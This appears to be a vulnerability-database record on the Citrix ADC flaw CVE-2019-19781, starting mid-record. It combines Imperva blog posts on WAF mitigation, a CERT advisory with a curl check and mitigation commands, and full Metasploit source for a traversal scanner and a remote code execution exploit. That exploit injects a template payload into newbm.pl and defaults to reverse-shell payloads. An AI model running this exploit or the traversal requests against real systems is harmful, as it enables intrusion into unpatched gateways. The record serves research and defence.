vulnerability was exploited. \nThe mitigation offered was to create a responder policy that would prevent HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL which would trigger a 403 response code.\n\nAt that point it was assumed the vulnerability would most likely take advantage of some sort of directory traversal flaw to upload malicious files to the /vpns/ path, leading to remote code execution. We created several research rules to detect HTTP requests to the suspicious path, but weren\u2019t able to capture any kind of malicious requests at that time.\n\nOn January 3, the [SANS Internet Storm Center (ISC) tweeted](<https://twitter.com/sans_isc/status/1213228049011007489>) that they\u2019d observed the \u201cfirst exploit attempt\u201d for this vulnerability in the wild, although they didn\u2019t include any additional details. At that point in time, no malicious requests were detected on any sites protected by Imperva.\n\nFrom January 7 onwards, several blog posts were published that gradually started to reveal the nature of the attack, until a POC and exploit was published on January 10.\n\nYou can read an in depth analysis of the vulnerability [here](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>) and [here](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>).\n\nAs attack activity rose immediately following the release of the POC/exploits, we found that the first stage of the attack was blocked out-of-the-box using existing directory traversal signatures - thus Imperva provided a mitigation for a zero day exploit.\n\nIn addition, the research rules that were set up prior to the POC/exploits both detected and blocked the second stage of the attack. What\u2019s more, they were able to block recon attempts by attackers trying to detect vulnerable Citrix ADC/GW by directly accessing the following paths, in an effort to retrieve the \u2018smb.conf\u2019 configuration file or reach the writeable script \u2018newbm.pl\u2019:\n\n * /vpns/\n * /vpn/../vpns/cfg/smb.conf\n * /vpn/../vpns/portal/scripts/newbm.pl\n\nFrom that point onwards we saw a surge in attack attempts on sites protected by Imperva, as shown in the graphs below:\n\nAfter the two initial exploits were published - a simple Bash script and a more detailed Python script - numerous other variations of the exploit appeared in several GitHub repositories. Below we can see the spread of various clients that were identified based on client verification tests, as sources of exploitation and scanning attempts on Imperva-protected sites:\n\nFrom the graph above we can see that, from January 11 onwards, most exploit attempts were executed using the Bash script - this was identified by cURL User-Agent as the script uses cURL to send the malicious request - followed by the Python scripts (there were two variations of the exploit, one using the Python urllib library, the other using the python-requests library).\n\nIn the last 24 hours (at the time of writing this post) we also noticed a sudden increase in requests from various vulnerability scanners, mainly WhiteHat Vulnerability Scanner.\n\nBelow you can see the amount of Imperva-protected sites targeted since the exploit attempts were detected in the wild, and the total number of sites attacked: \n\n\nAt the end of the day, our customers were protected right out-of-the-box in the Cloud and the On-prem WAF. The Threat Research team will keep tracking this and other zero-day vulnerabilities and their exploits, as well as constantly updating our WAF engine to provide the best mitigation to newly released vulnerabilities.\n\nThe post [Imperva Mitigates Exploits of Citrix Vulnerability - Right Out of the Box](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-01-19T15:00:50", "published": "2020-01-19T15:00:50", "id": "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "href": "https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/", "type": "impervablog", "title": "Imperva Mitigates Exploits of Citrix Vulnerability \u2013 Right Out of the Box", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&amp;\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object&#x27;s defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-07-06T15:01:00", "published": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2020-09-02T20:28:50", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "description": "**Name**| netscaler_traversal_rce \n---|--- \n**CVE**| CVE-2019-19781 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| netscaler_traversal_rce \n**Notes**| CVE Name: CVE-2019-19781 \nVENDOR: Citrix \nNOTES: This version of the module will take care of all our artifacts and will \nreport them just to be safe in case something went wrong during cleanup \n \nVersionsAffected: VERSIONS \nRepeatability: Infinite \nReferences: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781 \nDate public: 12/17/2019 \nCVSS: N/A \n\n", "edition": 1, "modified": "2019-12-27T14:15:00", "published": "2019-12-27T14:15:00", "id": "NETSCALER_TRAVERSAL_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/netscaler_traversal_rce", "title": "Immunity Canvas: NETSCALER_TRAVERSAL_RCE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2021-04-30T10:40:39", "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of a \"[global]\" directive in smb.conf, which this file should always contain.\n", "published": "2020-01-13T22:39:05", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-07-08T19:36:42", "id": "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',\n 'Description' => %{\n This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n a \"[global]\" directive in smb.conf, which this file should always contain.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Erik Wynter', # Module (@wyntererik)\n 'altonjx' # Module (@altonjx)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'AKA' => ['Shitrix']\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])\n ])\n end\n\n def run_host(target_host)\n turi = normalize_uri(target_uri.path, datastore['PATH'])\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => turi\n )\n\n unless res\n print_error(\"#{full_uri(turi)} - No response, target seems down.\")\n\n return Exploit::CheckCode::Unknown\n end\n\n unless res.code == 200\n print_error(\"#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.\")\n vprint_error(\"Obtained HTTP response code #{res.code} for #{full_uri(turi)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if turi.end_with?('smb.conf')\n unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\\[\\s*global\\s*\\]/)\n vprint_warning(\"#{turi} does not contain \\\"[global]\\\" directive.\")\n end\n end\n\n print_good(\"#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.\")\n msg = \"Obtained HTTP response code #{res.code} for #{full_uri(turi)}. \" \\\n \"This means that access to #{turi} was obtained via directory traversal.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/citrix_dir_traversal.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-13T16:38:35", "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n", "published": "2020-01-14T02:25:07", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-07-08T19:36:42", "id": "MSF:EXPLOIT/LINUX/HTTP/CITRIX_DIR_TRAVERSAL_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',\n 'Description' => %q{\n This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Project Zero India', # PoC used by this module\n 'TrustedSec', # PoC used by this module\n 'James Brytan', # PoC contributed independently\n 'James Smith', # PoC contributed independently\n 'Marisa Mack', # PoC contributed independently\n 'Rob Vinson', # PoC contributed independently\n 'Sergey Pashevkin', # PoC contributed independently\n 'Steven Laura', # PoC contributed independently\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (https://www.pirates.re/)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['EDB', '47901'],\n ['EDB', '47902'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['python', 'unix'],\n 'Arch' => [ARCH_PYTHON, ARCH_CMD],\n 'Privileged' => false,\n 'Targets' => [\n ['Python',\n 'Platform' => 'python',\n 'Arch' => ARCH_PYTHON,\n 'Type' => :python,\n 'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}\n ],\n ['Unix Command',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',\n 'HttpClientTimeout' => 3.5\n },\n 'Notes' => {\n 'AKA' => ['Shitrix'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def exploit\n unless datastore['ForceExploit']\n case check\n when CheckCode::Vulnerable\n print_good('The target appears to be vulnerable')\n when CheckCode::Safe\n fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')\n else\n fail_with(Failure::Unknown, 'The target vulnerability state is unknown')\n end\n end\n\n print_status(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\")\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n case target['Type']\n when :python\n execute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\"))\n when :unix_cmd\n if (res = execute_command(payload.encoded)) && cmd_unix_generic?\n print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))\n end\n end\n end\n\n def execute_command(cmd, _opts = {})\n filename = rand_text_alpha(8..42)\n nonce = rand_text_alpha(8..42)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),\n 'headers' => {\n 'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\",\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => rand_text_alpha(8..42),\n 'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\"\n }\n )\n\n unless res && res.code == 200\n print_error('No response to POST newbm.pl request')\n return\n end\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"),\n 'headers' => {\n 'NSC_USER' => rand_text_alpha(8..42),\n 'NSC_NONCE' => nonce\n },\n 'partial' => true\n )\n\n unless res && res.code == 200\n print_warning(\"No response to GET #{filename}.xml request\")\n end\n\n register_files_for_cleanup(\n \"/netscaler/portal/templates/#{filename}.xml\",\n \"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\"\n )\n\n res\n end\n\n def chr_payload(cmd)\n cmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.')\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/citrix_dir_traversal_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-13T16:35:38", "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of a \"[global]\" directive in smb.conf, which this file should always contain.\n", "published": "2020-01-13T22:39:05", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19781"], "modified": "2020-07-08T19:36:42", "id": "MSF:AUXILIARY/SCANNER/HTTP/CITRIX_DIR_TRAVERSAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',\n 'Description' => %{\n This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n a \"[global]\" directive in smb.conf, which this file should always contain.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Erik Wynter', # Module (@wyntererik)\n 'altonjx' # Module (@altonjx)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'AKA' => ['Shitrix']\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])\n ])\n end\n\n def run_host(target_host)\n turi = normalize_uri(target_uri.path, datastore['PATH'])\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => turi\n )\n\n unless res\n print_error(\"#{full_uri(turi)} - No response, target seems down.\")\n\n return Exploit::CheckCode::Unknown\n end\n\n unless res.code == 200\n print_error(\"#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.\")\n vprint_error(\"Obtained HTTP response code #{res.code} for #{full_uri(turi)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if turi.end_with?('smb.conf')\n unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\\[\\s*global\\s*\\]/)\n vprint_warning(\"#{turi} does not contain \\\"[global]\\\" directive.\")\n end\n end\n\n print_good(\"#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.\")\n msg = \"Obtained HTTP response code #{res.code} for #{full_uri(turi)}. \" \\\n \"This means that access to #{turi} was obtained via directory traversal.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/citrix_dir_traversal.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:41:42", "bulletinFamily": "info", "cvelist": ["CVE-2019-19781"], "description": "### Overview \n\nA vulnerability been [identified](<https://support.citrix.com/article/CTX267027>) in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC, Citrix Gateway formerly known as NetScaler Gateway, and Citrix SDWAN WANOP that could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nCitrix has published a [security bulletin](<https://support.citrix.com/article/CTX267027>) that mentions a vulnerability that can be exploited to achieve arbitrary code execution by a remote, unauthenticated attacker. Although the bulletin does not describe details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) describe techniques to block the handling of requests that contain a directory traversal attempt (`/../`) and also requests that attempt to access the `/vpns/` directory.\n\nLimited testing has shown that the affected Citrix software fails to restrict access to perl scripts that are available via the `/vpns/` path. An unauthenticated remote attacker may be able to provide crafted content to these scripts that result in arbitrary code execution. One technique that has been [outlined](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>) involves the writing of an XML file using a directory traversal and the subsequent command execution by way of the [Perl Template Toolkit](<http://www.template-toolkit.org/>). Other exploitation techniques may be possible. \n \nA link of the following form can be used to determine if a system is affected: \n`https:// CITRIXGATEWAY /vpn/../vpns/cfg/smb.conf` \n \nFor example, the following curl command can be used: \n`curl https:// CITRIXGATEWAY /vpn/../vpns/cfg/smb.conf --path-as-is -k -f` \n \nThe \"` CITRIXGATEWAY `\" string should be replaced with the name or IP of the system you wish to test. If retrieving the link results in a 403 Forbidden error, then the mitigations outlined below have likely been applied. However, if retrieving the link results in the contents of a `smb.conf` file, then the system is vulnerable. \n \n--- \n \n### Impact \n\nBy exploiting this vulnerability, a remote, unauthenticated attacker may be able to execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nCitrix has released updates in [Security Bulletin CTX267027](<https://support.citrix.com/article/CTX267027>). The updated software is designed to prevent unauthenticated attackers from accessing certain web server features. If updates are unavailable for your platform, or if you are otherwise unable to apply updates, please consider the following workarounds: \n \n--- \n \n**Block the handling of specially-crafted requests** \n \nCitrix article [CTX267679](<https://support.citrix.com/article/CTX267679>) contains several mitigation options for this vulnerability, depending on what type of product installation is used. For example, on a stand-alone system, the following commands are reported to mitigate this vulnerability: \n\n\n`nable ns feature responder` \n`add responder action respondwith403 respondwith \"\\\"HTTP/1.1 403 Forbidden\\r\\\\r\\` \n`add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") && (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403` \n`bind responder global ctx267027 1 END -type REQ_OVERRIDE` \n`save config ` \n \n`shell nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0` \n`shell \"echo 'nsapimgr_wr.sh -ys skip_systemaccess_policyeval=0' >> /nsconfig/rc.netscaler\"` \n`reboot` \nNote that other configurations, such as CLIP, and HA, the steps to mitigate this vulnerability may be different. Please see [CTX267679](<https://support.citrix.com/article/CTX267679>) for more details. \n \nAlso note that the above mitigation does not work on Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31, due to an altogether different bug. Release 12.1 users are recommended to update to an unaffected build and also apply mitigations for protection. \n--- \n \n### Vendor Information\n\n619785\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix Affected\n\nUpdated: January 08, 2020 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.citrix.com/article/CTX267027>\n * <https://support.citrix.com/article/CTX267679>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 9.5 | E:H/RL:W/RC:C \nEnvironmental | 7.1 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://support.citrix.com/article/CTX267027>\n * <https://support.citrix.com/article/CTX267679>\n * <https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>\n * <https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/>\n * <https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>\n * <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>\n * 